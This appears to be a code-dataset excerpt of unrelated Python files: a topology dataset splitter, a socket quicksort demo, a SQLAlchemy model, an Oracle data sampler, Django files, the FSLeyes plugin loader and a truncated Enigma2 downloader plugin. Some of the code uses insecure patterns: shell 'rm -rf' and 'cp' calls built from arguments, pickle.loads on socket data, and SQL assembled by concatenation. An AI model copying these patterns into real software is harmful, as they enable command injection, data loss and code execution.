data_dir = args.f1[0]
topology_name = args.name[0]
new_dir = "../Enero_datasets/dataset_sing_top/data/"+data_dir+"/NEW_"+topology_name+'/'
new_dir_train = new_dir+"TRAIN"
new_dir_eval = new_dir+"EVALUATE"
new_dir_all = new_dir+"ALL"
new_dir_TM_train = new_dir_train+"/TM/"
new_dir_TM_eval = new_dir_eval+"/TM/"
new_dir_TM_all = new_dir_all+"/TM/"
if not os.path.exists(new_dir):
os.makedirs(new_dir)
else:
os.system("rm -rf %s" % (new_dir))
os.makedirs(new_dir)
os.makedirs(new_dir_train)
os.makedirs(new_dir_eval)
os.makedirs(new_dir_all)
os.makedirs(new_dir_TM_train)
os.makedirs(new_dir_TM_eval)
os.makedirs(new_dir_TM_all)
# aux_top_name = "./data/"+data_dir+"/"+topology_name+"/graph_"+topology_name+".txt"
aux_top_name = "../Enero_datasets/results-1-link_capacity-unif-05-1/results_zoo/"+topology_name+"/"+topology_name+".graph"
os.system("cp %s %s.graph" % (aux_top_name, new_dir_train+'/'+topology_name))
os.system("cp %s %s.graph" % (aux_top_name, new_dir_eval+'/'+topology_name))
os.system("cp %s %s.graph" % (aux_top_name, new_dir_all+'/'+topology_name))
num_TMs_train = 0
nums_TMs_eval = 0
nums_TMs_all = 0
for subdir, dirs, files in os.walk("../Enero_datasets/results-1-link_capacity-unif-05-1/results_zoo/"+topology_name+"/TM/"):
for file in files:
#if file.startswith('TM-'):
if file.endswith('.demands'):
dst_dir = new_dir_TM_eval
tm_iter = nums_TMs_eval
# Compute handcrafted 70% of the total samples
if num_TMs_train<100:
dst_dir = new_dir_TM_train
tm_iter = num_TMs_train
os.system("cp %s %s.%s.demands" % (subdir+'/'+file, dst_dir+'/'+topology_name, tm_iter))
if num_TMs_train<100:
num_TMs_train += 1
else:
nums_TMs_eval += 1
dst_dir = new_dir_TM_all
tm_iter = nums_TMs_all
os.system("cp %s %s.%s.demands" % (subdir+'/'+file, dst_dir+'/'+topology_name, tm_iter))
nums_TMs_all += 1
|
23,438 | efaa58e2f87264c14ee9ad63eba7828960b7c3d1 | import socket
import pickle
import threading
import sys
import random
import functools
import reliable
import time
import quickLast
def server(HOST, PORT):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
print("waiting accept")
conn, addr = s.accept()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print("waiting for receive")
myobject = pickle.loads(reliable.receive(conn))
quickLast.quickSort(myobject, 0, len(myobject)-1)
reliable.send(conn, myobject)
conn.close
def argmin(values):
'''it helps to check minimum value on the list and return it's index"'''
return min(range(len(values)), key=values.__getitem__)
def merge(src_list):
'''src_list is a list of lists, each list is already sorted'''
result = []
while src_list:
first = list(map(lambda a: a[0], src_list)) #creating a list of all first elements
min_indx = argmin(first)
'''since we are working with a list of lists, using argmax function we are able to
work with the list which is being referenced by min_index, making all the append and
pop operations possible'''
arr = src_list[min_indx] #get a reference to the list
result.append(arr[0])
arr.pop(0)
if not arr:
src_list.pop(min_indx)
return result
def chunks(lst, n):
for i in range(0, len(lst), n):
yield lst[i:i+n]
def client(HOST, PORT, arr, result, i):
'''it send to the server a partition of the original list'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
reliable.send(s, arr)
res = pickle.loads(reliable.receive(s))
#print(res)
result[i] = res
s.close()
n_threads = int(input("How many buckets do you want to use? "))
result_array = [None] * n_threads #it creates a list of n elemens of none it helps to save all buckets array
rand_arr = [random.randint(0, 999) for i in range(3500)] #it creates an array with 3500 random elements
partition = list(chunks(rand_arr, int(len(rand_arr) / n_threads)))
HOST = "localhost"
PORT = 50007
# start the servers for listening the requests
servers = [threading.Thread(target=server, args=(HOST, PORT + i)) for i in range(n_threads)]
for t in servers: t.start()
clients = [threading.Thread(target=client, args=(HOST, PORT + i, partition[i], result_array, i))
for i in range(n_threads)]
for t in clients: t.start()
for t in clients: t.join()
sorted_arr = merge(result_array)
print(sorted_arr)
for t in servers: t.join()
|
23,439 | 9f4c0569bc50d60bb97c1b2f6fc378cb68a40013 | # -*- coding: utf-8 -*-
import pandas as pd
A = pd.Series([1,2,3],index=[1,2,3],name="A")
B = pd.Series([10,20,30],index=[1,2,3],name="B")
C = pd.Series([100,200,300],index=[1,2,3],name="C")
#D = pd.DataFrame({A.name:A,B.name:B,C.name:C},index=[1,2,3])
D = pd.DataFrame([A,B,C])
D.to_excel("C:/Temp/output.xlsx")
print("done!") |
23,440 | cdb49fa8744241885bd78039fc7a9044f447aeff | a=int(input("Ingrese Numero 1:"))
b=int(input("Ingrese Numero 2:"))
c=int(input("Ingrese Numero 3:"))
def max_de_tres(A,B,C):
if (A > B and A > C):
print("El numero mayor es el primer valor " + str(A))
else:
if (B > A and B > C):
print("El numero mayor es el segundo valor " + str(B))
else:
print("El numero mayor es el tercer valor " + str(C))
print max_de_tres(a,b,c) |
23,441 | 03a4d957800b6393e83ef560c1b155481e855343 | from abc import ABC
from .abstract_data_access_layer import AbstractDataAccessLayer
class BaseApi(ABC):
def __init__(
self, user_id: int, data_access_layer: AbstractDataAccessLayer, logger
) -> None:
"""
The Api's constructor should be used to determine that a user is a valid admin.
Args:
token: dictionary containing required credentials expected
for an admin user.
data_access_layer: an implementation of AbstractDataAccessLayer
logger: object with logging calls
Return:
None
"""
self._log = logger
self._dal = data_access_layer
self._user_id = user_id
|
23,442 | f657150e55efd281808500514e22e82154e8f104 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.mutable import MutableDict
from sqlalchemy import TypeDecorator
from sqlalchemy import types
from sqlalchemy import Column
from sqlalchemy import String
from sqlalchemy import Integer
from sqlalchemy import TIMESTAMP
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import BOOLEAN
from sqlalchemy import text
from sqlalchemy import DateTime
from model.base import *
__author__ = 'guoguangchuan'
class PublisherModel(Base):
__tablename__ = 'publisher'
id = Column(Integer, primary_key=True)
name = Column(String(30), nullable=False, server_default=text("''"), doc="发布方名称")
brief_introduction = Column(String(50), nullable=False, server_default=text("''"), doc="发布方简介")
logo = Column(String(50), nullable=False, server_default=text("''"), doc="发布方logo")
address = Column(String(50), nullable=False, server_default=text("''"), doc="发布方办公地址")
is_del = Column(BOOLEAN, nullable=False, server_default='0', doc="逻辑删除, true(删除)|false(未删除)")
update_time = Column(TIMESTAMP, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
create_time = Column(TIMESTAMP, nullable=False, server_onupdate=text("CURRENT_TIMESTAMP"))
|
23,443 | fdf1c50659e7a17aaea26389e80817ac1229432b | # -*- coding: utf-8 -*-
import time
import cx_Oracle, datetime
import math, numpy as np,random
import csv
from PIL import Image, ImageDraw, ImageFont
import sys
import os
reload(sys)
sys.setdefaultencoding('utf8')
os.environ['NLS_LANG'] = 'SIMPLIFIED CHINESE_CHINA.UTF8'
connection = cx_Oracle.connect('*****', '*****', '*******/****')
#read_oracle
def GetOracleDataSample(CenterLO, CenterLA, StartTime, EndTime, TimeStep,SampleTimecount, SampleCOunt, GridCount, Gridlen):
CenterGridStartlo = CenterLO - 0.5 * Gridlen
CenterGridEndlo = CenterLO + 0.5 * Gridlen
CenterGridStartla = CenterLA - 0.5 * Gridlen
CenterGridEndla = CenterLO + 0.5 * Gridlen
GridStartla = CenterLA - 0.5 * Gridlen - int(GridCount / 2) * Gridlen
GridStartl0 = CenterLO - 0.5 * Gridlen - int(GridCount / 2) * Gridlen
centergrididx=int(GridCount*GridCount/2)
T_StartTime=datetime.datetime.strptime(StartTime, '%Y-%m-%d %H:%M:%S')
T_EndTime = datetime.datetime.strptime(EndTime, '%Y-%m-%d %H:%M:%S')
divtime=T_EndTime - T_StartTime
totalTimestep = int((divtime.total_seconds()) / (TimeStep *60))
tmptimelist = list(range(10, totalTimestep))
SampleTimeIndexs = random.sample(tmptimelist, SampleCOunt)
ListAllGridData = {}
samplematrix = [[0.0 for i in range(SampleTimecount*2*GridCount*GridCount)] for i in range(SampleCOunt)]
samplelabels=[0.0 for i in range(SampleCOunt)]
for i in range(0, GridCount * GridCount):
yidx = int(i / GridCount)
xidx = int(i % GridCount)
tmpstartLO=GridStartl0+xidx*Gridlen
tmpstartLA=GridStartla+yidx*Gridlen
tmpendLO=tmpstartLO+Gridlen
tmpendLA=tmpstartLA+Gridlen
cursor = connection.cursor()
sql = r"select t.*,s.SUMINTENS from(select to_char(datetime,'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00' time, count(*) count from thunder2015 where dateTime>to_date('" + StartTime + "','yyyy-mm-dd hh24:mi:ss') and dateTime<to_date('" + EndTime + "','yyyy-mm-dd hh24:mi:ss') and longitude>=" + str(tmpstartLO) + " and longitude<" + str(tmpendLO) + " and latitude>=" + str(tmpstartLA) + " and latitude<" + str(tmpendLA) + " group by to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00' order by to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00') t left join (select to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00' time, sum(abs(INTENS)) SUMINTENS from thunder2015 where dateTime>to_date('" + StartTime + "','yyyy-mm-dd hh24:mi:ss') and dateTime<to_date('" + EndTime + "','yyyy-mm-dd hh24:mi:ss') and longitude>=" + str(tmpstartLO) + " and longitude<" + str(tmpendLO) + " and latitude>=" + str( tmpstartLA) + " and latitude<" + str(tmpendLA) + " group by to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00' order by to_char(datetime, 'yyyy-mm-dd hh24')||':'||LPAD(floor(minute/6)*6,2,'0')||':00') s on t.time=s.time"
sql.strip().lstrip().rstrip(',')
cursor.execute(sql)
result = cursor.fetchall()
GridInfos = {}
for line in result:
tmptime=line[0]
tmpcount=line[1]
tmpsumintens=line[2]
GridInfos[tmptime]={'count':float(tmpcount),'sumintens':tmpsumintens}
ListAllGridData[i]=GridInfos
for j in range(0,len(SampleTimeIndexs)):
tmpstarttime=T_StartTime+datetime.timedelta(minutes=SampleTimeIndexs[j]*TimeStep)
if datetime.datetime.strftime(tmpstarttime, '%Y-%m-%d %H:%M:%S') in ListAllGridData[centergrididx].keys():
if ListAllGridData[centergrididx][datetime.datetime.strftime(tmpstarttime, '%Y-%m-%d %H:%M:%S')]['count']>= 20:
samplelabels[j]=1
else:
samplelabels[j]=ListAllGridData[centergrididx][datetime.datetime.strftime(tmpstarttime, '%Y-%m-%d %H:%M:%S')]['count']/20
for grididx in range(0,(GridCount*GridCount)):
for timediv in range(0,SampleTimecount):
tmpsamplestarttime=tmpstarttime-datetime.timedelta(minutes=(timediv+1)*TimeStep)
if datetime.datetime.strftime(tmpsamplestarttime, '%Y-%m-%d %H:%M:%S') in ListAllGridData[grididx].keys():
samplematrix[j][grididx*SampleTimecount*2+timediv*2]=ListAllGridData[grididx][datetime.datetime.strftime(tmpsamplestarttime, '%Y-%m-%d %H:%M:%S')]['count']
samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2+1] = ListAllGridData[grididx][datetime.datetime.strftime(tmpsamplestarttime, '%Y-%m-%d %H:%M:%S')]['sumintens']
if samplematrix[j][grididx*SampleTimecount*2+timediv*2] >= 20:
samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2] = 1.0
else:
samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2] = \
samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2]/ 20
if samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2+1] >= 2000:
samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2 + 1] = 1.0
else:
samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2 + 1] = \
samplematrix[j][grididx * SampleTimecount * 2 + timediv * 2 + 1] / 2000
numpy_list = np.asarray(samplematrix)
np.save("./datamatrix", numpy_list)
numpy_labellist = np.asarray(samplelabels)
numpy_labellist.reshape(SampleCOunt,1)
np.save("./datalabels", numpy_labellist)
return samplematrix,samplelabels
|
23,444 | af9644e8066a95b9a6562cb9e394e2a6604ca689 | # Generated by Django 2.2.7 on 2019-11-19 14:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('flights', '0002_flight_owner'),
]
operations = [
migrations.AlterField(
model_name='flight',
name='arrival',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='flight',
name='departure',
field=models.CharField(max_length=50),
),
]
|
23,445 | c9c81d04f5f857e598c77eb4af277ab9733ab5fb | from django.urls import path
from django.conf.urls import url
from . import views
urlpatterns = [
path('categories/', views.CategoriesAPIView.as_view(), name='categories'),
path('levels/', views.LevelsAPIView.as_view(), name='levels'),
path('themes/', views.ThemesAPIView.as_view(), name='themes'),
url(r'^themes/(?P<theme_id>[0-9]+)/$', views.ThemeAPIView.as_view(), name='theme'),
url(r'^words/(?P<word_id>[0-9]+)/$', views.WordAPIView.as_view(), name='word')
]
|
23,446 | acee6552f46e888e5d6d7f884b54c35eb765fc82 | #!/usr/bin/env python
#
# plugins.py - Accessing installed FSLeyes plugins.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module provides access to installed FSLeyes plugins.
FSLeyes uses a simple plugin architecture for loading custom views, controls,
and tools. Plugins can be installed from Python libraries (e.g. as hosted on
`PyPi <https://pypi.org/>`_), or installed directly from a ``.py`` file.
In both cases, FSLeyes uses ``setuptools`` `entry points
<https://setuptools.readthedocs.io/en/latest/pkg_resources.html#entry-points>`_
to locate the items provided by plugin library/files.
Things plugins can provide
--------------------------
FSLeyes plugins can provide custom *views*, *controls* and *tools*:
- A *view* is a top level panel, such as an :class:`.OrthoPanel`,
:class:`.Scene3DPanel`, or :class:`.TimeSeriesPanel`. Views provided
by plugins are added to the top level *Views* menu.
- A *control* is a secondary panel, or toolbar, which is embedded within a
view, such as an :class:`.OverlayListPanel`, :class:`.OrthoToolBar`, or
:class:`.MelodicClassificationPanel`. Controls provided by plugins are
added to the *Settings* menu for each active view.
- A *tool* is an :class:`.Action` which is associated with a menu item
under the top-level *Tools* menu, such as the :class:`.ApplyFlirtXfmAction`
and the :class:`.ResampleAction`.
Loading/installing FSLeyes plugins
----------------------------------
FSLeyes plugins are loaded into a running FSLeyes as follows:
- Any Python libraries (e.g. installed from ``PyPi``) which are present the
environment that FSLeyes is running in, and which have a name beginning
with ``fsleyes-plugin-`` will automatically be detected by FSLeyes.
- Plugin ``.py`` files, which contain view, control, and/or tool definitions,
can be passed directly to the :func:`loadPlugin` function.
- Plugin ``.py`` files which are present in the FSLeyes settings directory,
or which are found in the ``FSLEYES_PLUGIN_PATH`` environment variable, will
be loaded by the :func:`initialise` function.
A plugin can be installed permanently into FSLeyes as follows:
- Any Python libraries (e.g. installed from ``PyPi``) which are present the
environment that FSLeyes is running in, and which have a name beginning
with ``fsleyes-plugin-`` will automatically be detected by FSLeyes.
- ``.py`` plugin files can be passed to the :func:`installPlugin`
function. This file will be saved into the FSLeyes settings directory
(e.g. ``~/.fsleyes/plugins/``).
Writing a FSLeyes plugin
------------------------
.. note:: A minimal example of a FSLeyes plugin library can be found in
``tests/testdata/fsleyes_plugin_example/``.
A FSLeyes plugin is a Python library, or a ``.py`` file, which contains
definitions for custom views, controls, and tools.
- Views must be sub-classes of the :class:`.ViewPanel` class.
- Controls must be sub-classes of the :class:`.ControlPanel` class. If your
custom control is designed to only work with a specific view, you should
override the :mod:`.ControlMixin.supportedViews` static method to return
the views that your control supports.
- Tools must be sub-classes of the :class:`.Action` class.
To write a ``.py`` file which can be loaded as a FSLeyes plugin, simply
define your views, controls, and tools in the file. The file path can then
be passed to the :func:`loadPlugin` or :func:`installPlugin` function.
To release a FSLeyes plugin as a library, you need to organise your code
as a Python library. Minimally, this requires the following:
- Arrange your ``.py`` file(s) into a Python package.
- Write a ``setup.py`` file.
- Give your library a name (the ``name`` argument to the ``setup``
function) which begins with ``'fsleyes-plugin-``.
- Expose your custom views, controls, and tools as `entry points
<https://packaging.python.org/specifications/entry-points/>`_ (the
``entry_points`` argument to the ``setup`` function).
A minimal ``setup.py`` file for a FSLeyes plugin might look like this:
```
import setuptools
setup(
# the name must begin with "fsleyes-plugin-"
name='fsleyes-plugin-my-cool-plugin',
# Views, controls, and tools must be exposed
# as entry points within groups called
# "fsleyes_views", "fsleyes_controls" and
# "fsleyes_tools" respectively.
entry_points={
'fsleyes_views' : [
'My cool view = myplugin:MyView'
]
'fsleyes_controls' : [
'My cool control = myplugin:MyControl'
]
'fsleyes_tools' : [
'My cool tool = myplugin:MyTool'
]
}
)
```
See the `Python Packaging guide
<https://packaging.python.org/tutorials/packaging-projects/>`_ for more
details on writing a ``setup.py`` file.
Module contents
---------------
The following functions can be used to load/install new plugins:
.. autosummary::
:nosignatures:
initialise
loadPlugin
installPlugin
The following functions can be used to access plugins:
.. autosummary::
:nosignatures:
listPlugins
listViews
listControls
listTools
"""
import os.path as op
import os
import sys
import glob
import logging
import collections
import pkg_resources
import fsl.utils.settings as fslsettings
import fsleyes.actions as actions
import fsleyes.views.viewpanel as viewpanel
import fsleyes.controls.controlpanel as ctrlpanel
log = logging.getLogger(__name__)
def initialise():
"""Calls :func:`loadPlugin` on all plugin files in the FSLeyes settings
directory, and found on the ``FSLEYES_PLUGIN_PATH`` environment variable.
"""
pluginFiles = list(fslsettings.listFiles('plugins/*.py'))
pluginFiles = [fslsettings.filePath(p) for p in pluginFiles]
fpp = os.environ.get('FSLEYES_PLUGIN_PATH', None)
if fpp is not None:
for dirname in fpp.split(op.pathsep):
pluginFiles.extend(glob.glob(op.join(dirname, '*.py')))
for fname in pluginFiles:
try:
loadPlugin(fname)
except Exception as e:
log.warning('Failed to load plugin file %s: %s', fname, e)
def listPlugins():
"""Returns a list containing the names of all installed FSLeyes plugins.
"""
plugins = []
for dist in pkg_resources.working_set:
if dist.project_name.startswith('fsleyes-plugin-'):
plugins.append(dist.project_name)
return list(sorted(plugins))
def _listEntryPoints(group):
"""Returns a dictionary containing ``{name : type}`` entry points for the
given entry point group.
https://setuptools.readthedocs.io/en/latest/pkg_resources.html#entry-points
"""
items = collections.OrderedDict()
for plugin in listPlugins():
for name, ep in pkg_resources.get_entry_map(plugin, group).items():
if name in items:
log.debug('Overriding entry point %s [%s] with entry point '
'of the same name from %s', name, group, plugin)
items[name] = ep.load()
return items
def listViews():
"""Returns a dictionary of ``{name : ViewPanel}`` mappings containing
the custom views provided by all installed FSLeyes plugins.
"""
views = _listEntryPoints('fsleyes_views')
for name, cls in list(views.items()):
if not issubclass(cls, viewpanel.ViewPanel):
log.debug('Ignoring fsleyes_views entry point '
'{} - not a ViewPanel'.format(name))
views.pop(name)
continue
return views
def listControls(viewType=None):
"""Returns a dictionary of ``{name : ControlPanel}`` mappings containing
the custom controls provided by all installed FSLeyes plugins.
:arg viewType: Sub-class of :class:`.ViewPanel` - if provided, only
controls which are compatible with this view type are
returned (as determined by
:meth:`.ControlMixin.supportedViews.`).
"""
ctrls = _listEntryPoints('fsleyes_controls')
for name, cls in list(ctrls.items()):
if not issubclass(cls, (ctrlpanel.ControlPanel,
ctrlpanel.ControlToolBar)):
log.debug('Ignoring fsleyes_controls entry point {} - '
'not a ControlPanel/ToolBar'.format(name))
ctrls.pop(name)
continue
supported = cls.supportedViews()
if viewType is not None and \
supported is not None and \
viewType not in supported:
ctrls.pop(name)
continue
return ctrls
def listTools():
"""Returns a dictionary of ``{name : Action}`` mappings containing
the custom tools provided by all installed FSLeyes plugins.
"""
tools = _listEntryPoints('fsleyes_tools')
for name, cls in list(tools.items()):
if not issubclass(cls, actions.Action):
log.debug('Ignoring fsleyes_tools entry point '
'{} - not an Action'.format(name))
tools.pop(name)
continue
return tools
def _findEntryPoints(filename, modname):
"""Used by :func:`loadPlugin`. Imports the given Python file (setting the
module name to ``modname``), and finds the FSLeyes entry points (views,
controls, or tools) that are defined within.
"""
log.debug('Importing %s as %s', filename, modname)
entryPoints = collections.defaultdict(dict)
pyver = sys.version_info[:2]
# Ugh.
if pyver >= (3, 5):
import importlib.util as imputil
spec = imputil.spec_from_file_location(modname, filename)
mod = imputil.module_from_spec(spec)
spec.loader.exec_module(mod)
elif pyver == (3, 4):
from importlib.machinery import SourceFileLoader
mod = SourceFileLoader(modname, filename).load_module()
else:
import imp
mod = imp.load_source(modname, filename)
sys.modules[modname] = mod
for name in dir(mod):
item = getattr(mod, name)
group = None
if not isinstance(item, type):
continue
if issubclass(item, viewpanel.ViewPanel): group = 'views'
elif issubclass(item, ctrlpanel.ControlPanel): group = 'controls'
elif issubclass(item, actions.Action): group = 'tools'
if group is not None:
log.debug('Found %s entry point: %s', group, name)
entryPoints['fsleyes_{}'.format(group)][name] = item
return entryPoints
def loadPlugin(filename):
"""Loads the given Python file as a FSLeyes plugin. """
name = op.splitext(op.basename(filename))[0]
modname = 'fsleyes_plugin_{}'.format(name)
distname = 'fsleyes-plugin-{}'.format(name)
if distname in listPlugins():
log.debug('Plugin %s is already in environment - skipping', distname)
return
log.debug('Loading plugin %s [dist name %s]', filename, distname)
dist = pkg_resources.Distribution(
project_name=distname,
location=op.dirname(filename),
version='0.0.0')
entryPoints = _findEntryPoints(filename, modname)
# Here I'm relying on the fact that
# Distribution.get_entry_map returns
# the actual dict that it uses to
# store entry points.
entryMap = dist.get_entry_map()
for group, entries in entryPoints.items():
entryMap[group] = {}
for name, item in entries.items():
ep = '{} = {}:{}'.format(name, modname, name)
ep = pkg_resources.EntryPoint.parse(ep, dist=dist)
entryMap[group][name] = ep
pkg_resources.working_set.add(dist)
def installPlugin(filename):
"""Copies the given Python file into the FSLeyes settings directory,
within a sub-directory called ``plugins``. After the file has been
copied, the path to the copy is passed to :func:`loadPlugin`.
"""
basename = op.splitext(op.basename(filename))[0]
dest = 'plugins/{}.py'.format(basename)
log.debug('Installing plugin %s', filename)
with open(filename, 'rt') as inf, \
fslsettings.writeFile(dest) as outf:
outf.write(inf.read())
dest = fslsettings.filePath(dest)
try:
loadPlugin(dest)
except Exception:
fslsettings.deleteFile(dest)
raise
|
23,447 | eb9e9e1f69503d90b15f28224d508fb48a3f2f4e | # coding:utf-8
'''
@Copyright:LintCode
@Author: hanqiao
@Problem: http://www.lintcode.com/problem/binary-tree-maximum-path-sum
@Language: Python
@Datetime: 16-05-19 03:43
'''
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: The root of binary tree.
@return: An integer
"""
def maxPathSum(self, root):
# write your code here
maxsum, _ = self.helper(root)
return maxsum
def helper(self, root):
if root is None:
return -sys.maxint, 0
left = self.helper(root.left)
right = self.helper(root.right)
single = max(left[1]+root.val, right[1]+root.val, 0)
maxpath = max(left[0], right[0], left[1] + right[1] + root.val)
return maxpath, single
|
23,448 | 85befc07111b9003c0ee8b604abadff332ec2f86 | from Plugins.Plugin import PluginDescriptor
from Screens.Console import Console
from Screens.ChoiceBox import ChoiceBox
from Screens.Screen import Screen
from Screens.InputBox import InputBox
from Screens.HelpMenu import HelpableScreen
from Components.GUIComponent import *
from Components.HTMLComponent import *
from Components.Button import Button
from Components.MenuList import MenuList
from Components.Label import Label
from Components.ActionMap import ActionMap, NumberActionMap, HelpableActionMap
from Components.ProgressBar import ProgressBar
from Components.Input import Input
from Components.ScrollLabel import ScrollLabel
from Components.Pixmap import Pixmap
from Components.Label import Label
from Components.Sources.List import List
from Components.Sources.StaticText import StaticText
from Components.FileList import FileList
from Components.Slider import Slider
from Components.Harddisk import harddiskmanager
from Components.config import getConfigListEntry, ConfigSubsection, ConfigText, ConfigLocations
from Components.config import config, ConfigSelection, ConfigBoolean, ConfigYesNo
from Components.config import getConfigListEntry, configfile
from Components.ConfigList import ConfigListScreen
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from Components.SelectionList import SelectionList
from Components.PluginComponent import plugins
from Components.AVSwitch import AVSwitch
from twisted.web.client import downloadPage, getPage
from socket import gethostbyname
from xml.dom.minidom import parse, getDOMImplementation
from xml.dom import Node, minidom
from Tools.Directories import *
from Tools.Directories import pathExists, fileExists, resolveFilename, SCOPE_PLUGINS, SCOPE_CURRENT_PLUGIN, SCOPE_CURRENT_SKIN, SCOPE_METADIR, SCOPE_MEDIA, SCOPE_LANGUAGE
from Tools.LoadPixmap import LoadPixmap
from enigma import eConsoleAppContainer, loadPNG, eTimer, quitMainloop, RT_HALIGN_LEFT, RT_VALIGN_CENTER, eListboxPythonMultiContent, eListbox, gFont, getDesktop
from cPickle import dump, load
from os import path as os_path, system as os_system, unlink, stat, mkdir, popen, makedirs, listdir, access, rename, remove, W_OK, R_OK, F_OK
from os import environ, system, path, listdir, remove
from time import time, gmtime, strftime, localtime
from stat import ST_MTIME
from image_viewer import ScreenBox
import datetime
import urllib2
import gettext
import os
config.plugins.ImageDownLoader2 = ConfigSubsection()
config.plugins.ImageDownLoader2.addstr = ConfigText(default='tsimage')
config.plugins.ImageDownLoader2.Downloadlocation = ConfigText(default='/media/', visible_width=50, fixed_size=False)
config.plugins.ImageDownLoader2.log = ConfigText(default='2> /tmp/ImageDownLoaderLog >&1')
config.plugins.ImageDownLoader2.debug = ConfigText(default='debugon')
config.plugins.ImageDownLoader2.swap = ConfigSelection([('auto', 'auto'),
('128', '128 MB'),
('256', '256 MB'),
('512', '512 MB'),
('0', 'off')], default='auto')
config.plugins.ImageDownLoader2.swapsize = ConfigText(default='128')
config.plugins.ImageDownLoader2.disclaimer = ConfigBoolean(default=True)
config.plugins.ImageDownLoader2.update = ConfigYesNo(default=False)
mounted_string = 'Nothing mounted at '
dwidth = getDesktop(0).size().width()
currversion = 'eo2.0'
mountedDevs = []
for p in harddiskmanager.getMountedPartitions(True):
mountedDevs.append((p.mountpoint, _(p.description) if p.description else ''))
def _(txt):
t = gettext.dgettext('ImageDownLoader', txt)
if t == txt:
t = gettext.gettext(txt)
return t
def getDownloadPath():
Downloadpath = config.plugins.ImageDownLoader2.Downloadlocation.value
if Downloadpath.endswith('/'):
return Downloadpath
else:
return Downloadpath + '/'
def freespace():
downloadlocation = getDownloadPath()
try:
diskSpace = os.statvfs(downloadlocation)
capacity = float(diskSpace.f_bsize * diskSpace.f_blocks)
available = float(diskSpace.f_bsize * diskSpace.f_bavail)
fspace = round(float(available / 1048576.0), 2)
tspace = round(float(capacity / 1048576.0), 1)
spacestr = 'Free space(' + str(fspace) + 'MB) Total space(' + str(tspace) + 'MB)'
return fspace
except:
return 0
class buFeeds(Screen):
def __init__(self, session):
self.session = session
if dwidth == 1280:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/feedsHD.xml'
else:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/feedsFHD.xml'
f = open(skin, 'r')
self.skin = f.read()
f.close()
Screen.__init__(self, session)
self.serversnames = []
self.serversurls = []
self['ButtonRedtext'] = Label(_('Exit'))
self['ButtonGreentext'] = Label(_('Please select ...'))
if currversion == 'eo2.0':
self.serversnames = ['</ zvonko67',
'</ G_ogi',
'</ dragec11',
'</ jopidane',
'</ mika (www.satelitin.com)']
self.serversurls = ['http://178.63.156.75/BackUpImages/zvonko67/',
'http://178.63.156.75/BackUpImages/G_ogi/',
'http://178.63.156.75/BackUpImages/dragec11/',
'http://178.63.156.75/BackUpImages/jopidane/',
'http://178.63.156.75/BackUpImages/mika/']
self.list = []
self['text'] = MenuList([], True, eListboxPythonMultiContent)
self.addon = 'emu'
self.icount = 0
self.downloading = False
self['actions'] = ActionMap(['SetupActions', 'ColorActions'], {'ok': self.okClicked,
'red': self.close,
'green': self.okClicked,
'cancel': self.close}, -2)
self.ListToMulticontent()
def ListToMulticontent(self):
res = []
theevents = []
self.events = []
self.events = self.serversnames
if dwidth == 1280:
self['text'].l.setItemHeight(34)
self['text'].l.setFont(0, gFont('Sansation-Bold', 24))
for i in range(0, len(self.events)):
res.append(MultiContentEntryText(pos=(0, 5), size=(2, 35), font=0, flags=RT_HALIGN_LEFT, text=''))
res.append(MultiContentEntryText(pos=(30, 2), size=(720, 35), font=0, flags=RT_HALIGN_LEFT, text=self.events[i]))
theevents.append(res)
res = []
else:
self['text'].l.setItemHeight(50)
self['text'].l.setFont(0, gFont('Sansation-Bold', 40))
for i in range(0, len(self.events)):
res.append(MultiContentEntryText(pos=(0, 5), size=(2, 50), font=0, flags=RT_HALIGN_LEFT, text=''))
res.append(MultiContentEntryText(pos=(30, 2), size=(720, 50), font=0, flags=RT_HALIGN_LEFT, text=self.events[i]))
theevents.append(res)
res = []
self['text'].l.setList(theevents)
self['text'].show()
def okClicked(self):
cindex = self['text'].getSelectionIndex()
selectedservername = self.serversnames[cindex]
selectedserverurl = self.serversurls[cindex]
self.session.open(Servers, selectedservername, selectedserverurl)
class Servers(Screen):
def __init__(self, session, selectedservername = None, selectedserverurl = None):
self.session = session
if dwidth == 1280:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/serversHD.xml'
else:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/serversFHD.xml'
f = open(skin, 'r')
self.skin = f.read()
f.close()
Screen.__init__(self, session)
self.selectedservername = selectedservername
self.rooturl = selectedserverurl
self['ButtonRedtext'] = Label(_('Exit'))
self['ButtonGreentext'] = Label(_('Please select ...'))
self.newsurl = ''
self.list = []
self['list'] = MenuList([], True, eListboxPythonMultiContent)
self.addon = 'emu'
self.icount = 0
self.searchstr = None
self.downloading = False
self.data = []
if self.selectedservername == '</ zvonko67':
self.groups = ['VuPlus_Solo2']
self.downloading = True
